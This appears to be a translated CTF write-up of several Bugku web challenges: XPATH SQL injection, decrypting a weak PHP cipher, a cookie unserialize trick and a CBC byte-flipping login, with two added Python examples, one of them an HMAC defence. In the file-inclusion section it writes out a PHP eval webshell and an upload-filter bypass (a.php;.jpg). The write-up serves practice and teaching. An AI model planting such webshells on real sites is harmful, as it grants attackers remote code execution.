Returns XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'

Change the B to lowercase and that's the flag.

Now look at level three:

XPATH syntax error: '~./Have_Fun.php~'

It's a blank page; view the source:

<!DOCTYPE html>
<html>
<head>
	<title>Have_Fun</title>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- <style>
html,body{
	padding: 0;
	margin: 0;
	background-color: #fff;
}
Only IP'1234' can access this site.
<style>  -->
</head>
<body>                        
</body>
</html>
<center><font  color= '#fff'>YOUR IP:39.172.208.228<br />Sorry,Only IP:192.168.0.100 Can Access This Site<br /><br></font></center>

Need to capture and modify the request; I'll come back to this later.

PHP_encrypt_1(ISCCCTF)

A zip file containing index.php; the challenge gives fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');          // the passed-in key is ignored; the key is always md5('ISCC')
    $x = 0;
    $char = '';
    $str = '';
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) { 
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];       // repeat the key until it is as long as the data
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);   // add byte-wise, mod 128
    }
    return base64_encode($str);
}
?>

Roughly understood: a string, run through this function with its key, becomes the string given in the challenge, so I need to write a decryption routine myself.

<?php

function decrypt()
{
    $miwen = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";	// the given base64-encoded ciphertext
    $mi1 = base64_decode($miwen);				// base64-decode it first

    $char ="";
    $str="";
    $len = strlen($mi1);						// length of the ciphertext

    $key = md5('ISCC');							// same as in the encrypt function, so we end up with the same key
    $x = 0;
    $klen = strlen($key);						// length of the key

    for ($s=0; $s < $len; $s++) {
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];						// take the x-th byte of key and append it to char; char is the actual keystream, identical for encryption and decryption
        $x+=1;
    }

    for ($i=0; $i < $len; $i++) {				// the core of the decryption
        $xia = ord($mi1[$i])-ord($char[$i]) ;	// encryption added the two and reduced mod 128; here we subtract
        if($xia < 0){
            $str .= chr($xia+128);				// a negative difference wraps back around mod 128
        }
        else{
            $str .= chr($xia % 128);			// otherwise the difference is the plaintext byte directly
        }
    }
    echo $str."\n";
}
decrypt();
?>

Run it and the flag comes out.
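The scheme above is a repeating-key cipher: a keystream made by cycling the 32-byte md5('ISCC') hex digest is added to the plaintext byte by byte mod 128, so anyone with the code can invert it by subtracting. This added Python version (not part of the challenge or the original post) implements both directions so the round trip can be checked; the test plaintext is constructed.

```python
import base64
import hashlib

# The key the challenge hard-codes: md5('ISCC') as a 32-character hex string.
KEY = hashlib.md5(b"ISCC").hexdigest().encode()

# The ciphertext given by the challenge (base64, 38 bytes once decoded).
CIPHERTEXT = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="

def keystream(length: int) -> bytes:
    """Cycle the key until it covers the message; this is the $char loop in the PHP."""
    return (KEY * (length // len(KEY) + 1))[:length]

def encrypt(data: bytes) -> str:
    """Byte-wise (plain + key) mod 128, then base64; mirrors the challenge's encrypt()."""
    ks = keystream(len(data))
    return base64.b64encode(bytes((d + k) % 128 for d, k in zip(data, ks))).decode()

def decrypt(b64: str) -> bytes:
    """Inverse: (cipher - key) mod 128. Python's % already wraps negatives,
    so the separate '< 0' branch of the PHP decrypt is not needed."""
    raw = base64.b64decode(b64)
    ks = keystream(len(raw))
    return bytes((c - k) % 128 for c, k in zip(raw, ks))
```

Plaintext bytes of 128 or more are not recoverable because the encrypt side reduces mod 128; the flag is plain ASCII, so that does not matter here.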

文件包含2 (File inclusion 2)

The hint is file inclusion.

URL: http://123.206.31.85:49166/index.php?file=hello.php

Viewing the source, <!-- upload.php --> at the top points to upload.php.

Uploaded a one-line webshell with a changed extension; the upload succeeded, but neither direct access nor file inclusion let Caidao or AntSword connect to it.

Later I changed the one-liner to

<script language=php>echo 'a'; eval($_POST['pass']);</script>

Renamed the file to a.php;.jpg and the upload succeeded; reading it through the file inclusion returned an "a". Connected with AntSword directly and found a file named this_is_th3_F14g_154f65sd4g35f4d6f43.txt, which contains the flag.

flag.php

Clicking login does nothing at all.

Back to the hint given with the challenge:

Hint: hint

Nothing in the source either.

Had to go look at others' write-ups.

They all pass hint=1 via GET and the source appears; I tried it and got

<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   
    echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
  <form method="POST" action="#">
    <p><input name="user" type="text" placeholder="Username"></p>
    <p><input name="password" type="password" placeholder="Password"></p>
    <p><input value="Login" type="button"/></p>
  </form>
</div>
</body>
</html>

<?php
}
$KEY='ISecer:www.isecer.com';
?>

Looking it over, it isn't that complicated, just send a cookie, but there is a pitfall.

$KEY is assigned further down, so in the upper half of the statement it is undefined.

So unserialize($cookie) returns null.

So we need to pass s:0:" ";

Just build the cookie ISecer=s:0:" "; and that's it.

Sending it directly in Firefox didn't work, so I changed the cookie in Burp and the flag came out.

sql注入2 (SQL injection 2)

The challenge says everything is filtered, desperate? Hint: !,!=,=,+,-,^,%

Trying a few things, the username admin returns "wrong password", so the account is settled; now the password. I wanted to brute-force it, but the password is rather long.

Let's do the challenge properly.

But... I simply went to http://123.206.87.240:8007/web2/flag in the address bar and the flag downloaded.

孙xx的博客 (Sun xx's blog)

No idea how to approach this one; the challenge number seems to have changed and I can't find a write-up.

Trim的日记本 (Trim's diary)

A scan with Yujian finds http://123.206.87.240:9002/show.php

Open it and the flag is right there.

login2(SKCTF)

Hint: command execution.

The target is broken; it keeps saying it cannot connect to the database.

login3(SKCTF)

Hint: boolean-based blind SQL injection.

Also says it cannot connect to the database.

文件上传2(湖湘杯) (File upload 2, Huxiang Cup)

The page won't open.

江湖魔头 (Jianghu villain)

Setting this one aside for now, too hard.

login4

Hint: CBC byte-flipping attack.

It's a login form. Random input says I'm not an admin; logging in as admin says the admin doesn't need to log in. Let's capture the request.

The cookie contains

Cookie: PHPSESSID=geaegok09kdgpv30reekm2uvb5; user=UTw%2BPCx%2FempFfml9eypON1KVb1YjKDBlbWx3mTBbdSIVFBRhoQ%3D%3D

First, look up what a CBC byte-flipping attack is.

Found a very detailed blog post: https://blog.csdn.net/csu_vc/article/details/79619309

A Yujian scan finds an index.php.swp.

On Linux, vim -r index.php.swp recovers it; here is the source:

<!DOCTYPE html PUBLIC "-//W4C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>Login Form</title>
    <link href="static/css/style.css" rel="stylesheet" type="text/css"/>
    <script type="text/javascript" src="static/js/jquery.min.js"></script>
    <script type="text/javascript">
        $(document).ready(function () {
            $(".username").focus(function () {
                $(".user-icon").css("left", "-48px");
            });
            $(".username").blur(function () {
                $(".user-icon").css("left", "0px");
            });

            $(".password").focus(function () {
                $(".pass-icon").css("left", "-48px");
            });
            $(".password").blur(function () {
                $(".pass-icon").css("left", "0px");
            });
        });
    </script>
</head>

<?php
define("SECRET_KEY", file_get_contents('/root/key'));
define("METHOD", "aes-128-cbc");
session_start();

function get_random_iv()
{
    $random_iv = '';
    for ($i = 0; $i < 16; $i++) {
        $random_iv .= chr(rand(1, 255));
    }
    return $random_iv;
}

function login($info)
{
    $iv = get_random_iv();
    $plain = serialize($info);
    $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
    $_SESSION['username'] = $info['username'];
    setcookie("iv", base64_encode($iv));
    setcookie("cipher", base64_encode($cipher));
}

function check_login()
{
    if (isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])) {
        $cipher = base64_decode($_COOKIE['cipher']);
        $iv = base64_decode($_COOKIE["iv"]);
        if ($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)) {
            $info = unserialize($plain) or die("<p>base64_decode('" . base64_encode($plain) . "') can't unserialize</p>");
            $_SESSION['username'] = $info['username'];
        } else {
            die("ERROR!");
        }
    }
}

function show_homepage()
{
    if ($_SESSION["username"] === 'admin') {
        echo '<p>Hello admin</p>';
        echo '<p>Flag is $flag</p>';
    } else {
        echo '<p>hello ' . $_SESSION['username'] . '</p>';
        echo '<p>Only admin can see flag</p>';
    }
    echo '<p><a href="loginout.php">Log out</a></p>';
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = (string)$_POST['username'];
    $password = (string)$_POST['password'];
    if ($username === 'admin') {
        exit('<p>admin are not allowed to login</p>');
    } else {
        $info = array('username' => $username, 'password' => $password);
        login($info);
        show_homepage();
    }
} else {
    if (isset($_SESSION["username"])) {
        check_login();
        show_homepage();
    } else {
        echo '<body class="login-body">
                <div id="wrapper">
                    <div class="user-icon"></div>
                    <div class="pass-icon"></div>
                    <form name="login-form" class="login-form" action="" method="post">
                        <div class="header">
                        <h1>Login Form</h1>
                        <span>Fill out the form below to login to my super awesome imaginary control panel.</span>
                        </div>
                        <div class="content">
<input name="username" type="text" class="input username" value="Username" onfocus="this.value=\'\'" />
                        <input name="password" type="password" class="input password" value="Password" onfocus="this.value=\'\'" />
                        </div>
                        <div class="footer">
                        <input type="submit" name="submit" value="Login" class="button" />
                        </div>
                    </form>
                </div>
            </body>';
    }
}
?>
</html>              
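check_login() above decrypts whatever iv and cipher cookies the browser sends and then unserializes the result; nothing proves the cookies were issued by the server, which is exactly what a CBC byte-flipping attack relies on (a changed IV byte changes the same byte of the first plaintext block). This added example (not part of the challenge or the original post) shows the fix a defender would apply: an HMAC tag over iv||cipher checked in constant time before any decryption. The MAC key and the ciphertext bytes are constructed placeholders, not the challenge's /root/key or real AES output.

```python
import base64
import hashlib
import hmac

# Constructed stand-in for a server-side MAC key; the challenge's real key is not on the page.
MAC_KEY = b"constructed-mac-key-not-the-real-one"

def seal_cookies(iv: bytes, cipher: bytes, mac_key: bytes = MAC_KEY) -> dict:
    """Encrypt-then-MAC: the tag covers iv||cipher, so neither cookie can be
    altered (or swapped for another session's) without the tag failing."""
    tag = hmac.new(mac_key, iv + cipher, hashlib.sha256).digest()
    return {
        "iv": base64.b64encode(iv).decode(),
        "cipher": base64.b64encode(cipher).decode(),
        "tag": base64.b64encode(tag).decode(),
    }

def verify_cookies(cookies: dict, mac_key: bytes = MAC_KEY):
    """Return (iv, cipher) only when the tag checks out, otherwise None.
    Only after this would the server call openssl_decrypt/unserialize."""
    try:
        iv = base64.b64decode(cookies["iv"], validate=True)
        cipher = base64.b64decode(cookies["cipher"], validate=True)
        tag = base64.b64decode(cookies["tag"], validate=True)
    except (KeyError, ValueError):          # missing cookie or malformed base64
        return None
    expected = hmac.new(mac_key, iv + cipher, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    return iv, cipher

def tamper_iv(cookies: dict, index: int, mask: int = 0x01) -> dict:
    """Simulate the tampering the attack performs: XOR one IV byte. With the tag
    in place this is what verify_cookies() must reject."""
    iv = bytearray(base64.b64decode(cookies["iv"]))
    iv[index] ^= mask
    return {**cookies, "iv": base64.b64encode(bytes(iv)).decode()}
```

A real fix would also replace serialize/unserialize with a data-only format such as JSON, since a valid tag only proves origin, not that the payload is safe to unserialize.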